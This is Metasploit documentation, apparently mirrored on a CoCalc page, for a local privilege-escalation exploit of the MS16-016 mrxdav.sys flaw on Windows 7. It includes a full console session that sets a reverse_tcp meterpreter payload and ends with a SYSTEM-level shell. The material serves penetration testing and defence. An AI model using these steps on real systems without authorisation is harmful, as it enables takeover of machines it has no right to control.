CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/ms16_016_webdav.md
Views: 1904

Introduction

This module exploits a null pointer dereference vulnerability present in the mrxdav.sys kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)

Usage

You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the payload and session options. From here, running the module will result in the payload being executed with system level privileges.

An example session follows:

meterpreter > background
[*] Backgrounding session 5...
msf exploit(handler) > use exploits/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set session 5
session => 5
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms16_016_webdav) > set lport 4567
lport => 4567
msf exploit(ms16_016_webdav) > set lhost 192.168.1.203
lhost => 192.168.1.203
msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 192.168.1.203:4567
[*] Launching a process to host the payload DLL, then reflectively injecting the DLL and running it...
[*] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (957999 bytes) to 192.168.1.221
[*] Meterpreter session 12 opened (192.168.1.203:4567 -> 192.168.1.221:49266) at 2016-07-05 22:07:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM